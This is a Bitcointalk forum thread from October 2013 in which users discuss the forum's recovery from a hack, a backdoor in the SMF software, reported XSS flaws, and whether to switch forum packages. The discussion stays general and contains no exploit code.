HellDiverUK
|
|
October 08, 2013, 07:21:29 AM |
|
So, if there are so many problems with SMF, why does thermos still use it? There must be some open-source forum software that could be used.
Usually laziness. Most forums software will import the database from other forums. There's plenty - phpBB is the biggest one, OK it has it's problems too, but it's being worked on constantly by the developers.
|
|
|
|
phelix
Legendary
Offline
Activity: 1708
Merit: 1020
|
|
October 08, 2013, 07:45:09 AM |
|
SMF v2.0.2 has many vulnerabilities.
Yeah. SMF 2.x is basically 1.x with more features (ie. more attack area) and a slightly more secure database escaping scheme. Upgrading probably isn't worthwhile unless we want the better license. 1.x makes perfect sense then. Maybe the sanitizing part can be backported/improved. Are there any logs of hacking action? When was the backdoor placed again? The big question is why was the backdoor revealed? Just for the lulz? Or was it a second hax0r?
Why not reveal it? It was going to be discovered eventually by those trying to fix the forum and revealing that a two year old backdoor was used made it more difficult for theymos to claim it was some new, previously unheard of exploit. There's some lulz to be had when you tell someone how you did something just after it happens and it still takes them days to find and fix the problem. Because it will be fixed if you reveal it and you lose access. There are plenty of other much worse things the hacker could have done, that would even have made him money. Hopefully we are lucky and it was a gray hat. On the other hand side - who would like to really call for the wrath of this forum...
|
|
|
|
myself
Legendary
Offline
Activity: 938
Merit: 1000
chaos is fun...…damental :)
|
|
October 08, 2013, 07:55:37 AM |
|
re enable BlackBox theme, this one is way too white
|
Los desesperados publican que lo inventó el rey que rabió, porque todo son en el rabias y mas rabias, disgustos y mas disgustos, pezares y mas pezares; si el que compra algunas partidas vé que baxan, rabia de haver comprado; si suben, rabia de que no compró mas; si compra, suben, vende, gana y buelan aun á mas alto precio del que ha vendido; rabia de que vendió por menor precio: si no compra ni vende y ván subiendo, rabia de que haviendo tenido impulsos de comprar, no llegó á lograr los impulsos; si van baxando, rabia de que, haviendo tenido amagos de vender, no se resolvió á gozar los amagos; si le dan algun consejo y acierta, rabia de que no se lo dieron antes; si yerra, rabia de que se lo dieron; con que todo son inquietudes, todo arrepentimientos, tododelirios, luchando siempre lo insufrible con lo feliz, lo indomito con lo tranquilo y lo rabioso con lo deleytable.
|
|
|
TsuyokuNaritai
|
|
October 08, 2013, 08:00:37 AM |
|
re enable BlackBox theme, this one is way too white
+1.
|
|
|
|
greyhawk
|
|
October 08, 2013, 08:17:12 AM |
|
Because it will be fixed if you reveal it and you lose access.
Not if you've got more than the backdoor you revealed.
|
|
|
|
🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
Offline
Activity: 1316
Merit: 1043
👻
|
|
October 08, 2013, 08:22:27 AM |
|
The backdoor is specific to the forum. It's probably something as simple as eval() with certain arguments passed in obscure and unintended methods.
|
|
|
|
Maged
Legendary
Offline
Activity: 1204
Merit: 1015
|
|
October 08, 2013, 05:52:33 PM |
|
Because it will be fixed if you reveal it and you lose access.
Not if you've got more than the backdoor you revealed. You would have to have an additional whole SMF exploit to safely reveal your access, because when backdoors are suspected, people usually sanitize everything - just as we did here. Not even a backdoor embedded in the BIOS would have survived the cleanup that theymos did, since we completely changed hardware and rebuilt everything from the ground up. A backdoor in the database might still exist, but theymos looked pretty hard for those. So, other than that, the only way this guy is getting back in is if he has an exploit that anyone could have found. The backdoor is specific to the forum. It's probably something as simple as eval() with certain arguments passed in obscure and unintended methods.
Probably...
|
|
|
|
clock27
|
|
October 08, 2013, 06:07:41 PM |
|
very happy the forum is back up keep up the good work
|
|
|
|
thechevalier
Newbie
Offline
Activity: 40
Merit: 0
|
|
October 08, 2013, 07:03:50 PM |
|
Great job recovering from the hack!
I know how hard it is to keep an SMF forum secure. I ran a much smaller forum on SMF, and it was a constant battle (both SMF 1 and 2). Eventually, I switched to something else that was easier (for me) to keep secure.
(I'm not suggesting changing to another forum package is the right thing to do here as it sounds like you have a really good understanding of SMF security vulnerabilities and how to mitigate attacks now, and that's really the most important thing).
|
|
|
|
Baitty
|
|
October 08, 2013, 10:16:29 PM |
|
Glad it's back up I lost all information on bitcoin because this is where I get most of it
|
Currently held as collateral by monbux
|
|
|
BitPirate
Full Member
Offline
Activity: 238
Merit: 100
RMBTB.com: The secure BTC:CNY exchange. 0% fee!
|
|
October 09, 2013, 01:12:19 AM Last edit: October 09, 2013, 02:39:10 AM by BitPirate |
|
Don't fool yourself into a false sense of security. SMF v2.0.2 has many vulnerabilities.
It seems like you are referring to the same vulnerabilities referenced in this thread: http://www.simplemachines.org/community/index.php?topic=482530.0The SMF Project Manager had this to say about it: this is, essentially, BS...
not because it's not true... but because in order to take advantage of it, the person needs to already have access to the admin section... and if you have full access to the admin section, you already have access to ALL of the users' data and the ability to upload packages - so this "injection" complaint is really kinda silly. Not that I really care if we update or not, because I can understand the advantages and disadvantages of both actions. But I would like to see something happen to make this forum a bit more secure. This reads to me like they don't understand the dangers of XSS. Which is kinda worrying if that is an official response. The advisory describes a persistent XSS flaw in the Admin section. The comment about admins already having access is completely off the mark. XSS attacks are always executed in the context of the privileged user. The validation flaw could be behind bloody Fort Knox -- it doesn' t matter in the slightest; the attack is still exactly the same as if it were in the front-end. That forum thread is a face-palm. If you need a reason to move away from SMF, there it is.
|
|
|
|
duhosnyul
|
|
October 09, 2013, 12:11:10 PM |
|
Thanks Theymos and others who help maintained this forum.
|
|
|
|
tspacepilot
Legendary
Offline
Activity: 1456
Merit: 1081
I may write code in exchange for bitcoins.
|
|
October 09, 2013, 02:52:24 PM |
|
So, if there are so many problems with SMF, why does thermos still use it? There must be some open-source forum software that could be used. At least in that case the skills of the thousands of people using this forum and offering opinions about the code could be put to some profitable use. Right?
Someone must have a good answer.
|
|
|
|
stormlighter
|
|
October 09, 2013, 03:58:06 PM |
|
Glad BTCT is up and running again Lock all staff/admin accounts to 1 IP. Thats one way to prevent exploits if someone was to get the password for a admin account. Admins would be forced to use the same IP via VPN or proxy service
|
|
|
|
greyhawk
|
|
October 09, 2013, 04:09:23 PM |
|
Glad BTCT is up and running again You may want to take another look at that.
|
|
|
|
stormlighter
|
|
October 09, 2013, 04:17:27 PM |
|
Heh.. well I use it without any plugins or addons and whatnot. Access to the forum is all I need
|
|
|
|
jeffhuys
|
|
October 09, 2013, 05:40:24 PM |
|
Glad BTCT is up and running again You may want to take another look at that. it was such an awesome site. I hate it.
|
|
|
|
sdp
|
|
October 10, 2013, 05:23:45 AM |
|
I wonder if the fact that this site was brought down at the same time as silk road was anymore of a coincidence.
|
Coinsbank: Left money in their costodial wallet for my signature. Then they kept the money.
|
|
|
sdp
|
|
October 10, 2013, 11:21:15 AM |
|
Login with only the hash? That basically allows any admin to impersonate another user. How could SMF think that was a good idea??
An administrator can by definition do anything. It is sometimes useful if you want to do something on a user's behalf or for testing whether permissions are respected correctly.
|
Coinsbank: Left money in their costodial wallet for my signature. Then they kept the money.
|
|
|
snappa4ever
|
|
October 10, 2013, 01:37:59 PM |
|
Login with only the hash? That basically allows any admin to impersonate another user. How could SMF think that was a good idea??
An administrator can by definition do anything. It is sometimes useful if you want to do something on a user's behalf or for testing whether permissions are respected correctly. By default the administrator has the power to do that. If not the admin can go to phpadmin and change the hash with other known hash and login using the new password and change the hash again after the login.
|
|
|
|
|